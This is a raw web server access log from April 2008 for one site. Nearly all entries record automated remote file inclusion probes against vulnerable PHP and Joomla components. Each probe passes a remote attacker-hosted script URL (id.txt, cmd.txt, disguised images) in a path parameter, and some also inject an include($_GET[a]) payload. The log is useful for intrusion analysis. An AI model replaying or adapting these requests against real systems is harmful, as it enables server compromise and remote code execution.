99.238.107.156 - - [23/Apr/2008:11:50:02 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [23/Apr/2008:11:50:12 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [23/Apr/2008:11:50:13 -0700] "GET //config.inc.php?path_escape=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [23/Apr/2008:11:50:13 -0700] "GET /logs//config.inc.php?path_escape=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
99.238.107.156 - - [23/Apr/2008:11:50:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:50:48 -0700] "GET /logs/access_080324.log/?svr_rootP=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:50:52 -0700] "GET /?svr_rootP=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:11:50:56 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:11:50:57 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:51:04 -0700] "GET /logs/?svr_rootP=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.810" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:51:51 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:51:51 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:51:52 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:51:52 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:11:52:05 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:52:08 -0700] "GET /logs/access.log/errors.php?error=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:52:08 -0700] "GET /errors.php?error=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:52:08 -0700] "GET /logs/errors.php?error=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:52:33 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:52:35 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.20.9.225 - - [23/Apr/2008:11:53:32 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.20.9.225 - - [23/Apr/2008:11:53:32 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.20.9.225 - - [23/Apr/2008:11:53:32 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:11:53:38 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:53:53 -0700] "GET /logs/access_080304.log/?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:53:57 -0700] "GET /?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
209.121.50.114 - - [23/Apr/2008:11:53:58 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.121.50.114 - - [23/Apr/2008:11:53:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.121.50.114 - - [23/Apr/2008:11:53:58 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.9.225 - - [23/Apr/2008:11:54:03 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:54:07 -0700] "GET /logs/?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.810" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:54:08 -0700] "GET /logs/access_071224.log/inc/lib/fckeditor/editor/plugins/ImageManager/config.php=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:54:08 -0700] "GET /inc/lib/fckeditor/editor/plugins/ImageManager/config.php=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:54:08 -0700] "GET /logs/inc/lib/fckeditor/editor/plugins/ImageManager/config.php=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.37.115 - - [23/Apr/2008:11:54:23 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 859311 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:11:54:24 -0700] "GET /logs/access_080226.log//components/com_simpleboard/file_upload.php?sbp=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:55:43 -0700] "GET /logs/access_080224.log/?GALLERY_BASEDIR=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:55:46 -0700] "GET /?GALLERY_BASEDIR=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:55:56 -0700] "GET /logs/?GALLERY_BASEDIR=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.810" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:11:56:01 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.114.53.153 - - [23/Apr/2008:11:56:01 -0700] "GET /logs/access_071224.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.150.23 - - [23/Apr/2008:11:56:12 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "www.dmulk.com"
85.195.119.14 - - [23/Apr/2008:11:56:13 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:56:14 -0700] "GET /logs/access_080218.log/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [23/Apr/2008:11:56:27 -0700] "GET /logs/access_080329.log/index.php?option=com_custompages&cpage=http://www.redfroggy.com/adposts/posts/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:56:27 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.207.204.13 - - [23/Apr/2008:11:56:32 -0700] "GET /index.php?option=com_custompages&cpage=http://www.redfroggy.com/adposts/posts/idnews.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [23/Apr/2008:11:56:32 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.redfroggy.com/adposts/posts/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:56:33 -0700] "GET /logs/access_080218.log/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:56:33 -0700] "GET /?mosConfig_absolute_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:56:34 -0700] "GET /logs/?mosConfig_absolute_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.810" "www.dmulk.com"
64.207.204.13 - - [23/Apr/2008:11:56:35 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.redfroggy.com/adposts/posts/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:56:39 -0700] "GET /logs/access_080218.log/errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:56:45 -0700] "GET /logs/access_080218.log/errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:57:12 -0700] "GET /logs/access_080218.log/errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.35.179 - - [23/Apr/2008:11:57:16 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
209.121.50.114 - - [23/Apr/2008:11:57:45 -0700] "GET /logs/access_080227.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:58:04 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:58:19 -0700] "GET /logs/access_071215.log/modifyform.html?code=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:58:19 -0700] "GET /modifyform.html?code=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:58:25 -0700] "GET /logs/modifyform.html?code=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:58:35 -0700] "GET /logs/access_071215.log/modifyform.html?code=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:58:35 -0700] "GET /modifyform.html?code=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:58:35 -0700] "GET /logs/modifyform.html?code=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:58:51 -0700] "GET /logs/access_080312.log/?mosConfig_absolute_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:58:59 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.53.138.150 - - [23/Apr/2008:11:59:16 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.138.150 - - [23/Apr/2008:11:59:19 -0700] "GET //index.php?option=com_custompages&cpage=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.138.150 - - [23/Apr/2008:11:59:25 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:59:32 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.85.40.150 - - [23/Apr/2008:12:00:05 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:00:17 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:00:17 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:00:20 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:12:00:21 -0700] "GET //citywriter/head.php?path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:12:00:40 -0700] "GET /logs/access_080302.log/?thisdir=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:00:58 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:01:00 -0700] "GET /logs/access_071215.log/modifyform.html?code=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:01:00 -0700] "GET /modifyform.html?code=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:01:01 -0700] "GET /logs/modifyform.html?code=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:01:12 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:01:18 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:01:19 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:01:25 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:01:41 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:01:41 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:01:42 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:01:43 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:02:03 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.32.199.201 - - [23/Apr/2008:12:03:00 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.32.199.201 - - [23/Apr/2008:12:03:00 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.6.18.227 - - [23/Apr/2008:12:03:34 -0700] "GET /logs/access_080217.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.52.143.16 - - [23/Apr/2008:12:03:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
81.52.143.16 - - [23/Apr/2008:12:03:54 -0700] "GET /presto HTTP/1.1" 301 91 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
92.48.75.104 - - [23/Apr/2008:12:05:07 -0700] "GET /logs/access.log/errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [23/Apr/2008:12:05:07 -0700] "GET /errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [23/Apr/2008:12:05:08 -0700] "GET /logs/errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [23/Apr/2008:12:05:21 -0700] "GET /logs/access.log/errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [23/Apr/2008:12:05:22 -0700] "GET /errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [23/Apr/2008:12:05:22 -0700] "GET /logs/errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:12:05:36 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:12:05:38 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:05:59 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST%5Boption%5D=option,com_comprofiler&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:06:00 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5Boption%5D=option,com_comprofiler&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
66.221.79.151 - - [23/Apr/2008:12:06:04 -0700] "GET /logs/access_080226.log//config.inc.php?path_escape=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.194.149.65 - - [23/Apr/2008:12:06:06 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.194.149.65 - - [23/Apr/2008:12:06:09 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
213.194.149.65 - - [23/Apr/2008:12:06:09 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:06:11 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:06:12 -0700] "GET //includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:06:12 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:06:36 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST%5Boption%5D=option,com_comprofiler&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
198.65.21.204 - - [23/Apr/2008:12:06:36 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.jdsales.de/contenido/includes/print.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.65.21.204 - - [23/Apr/2008:12:06:36 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.jdsales.de/contenido/includes/print.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.65.21.204 - - [23/Apr/2008:12:06:36 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.jdsales.de/contenido/includes/print.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
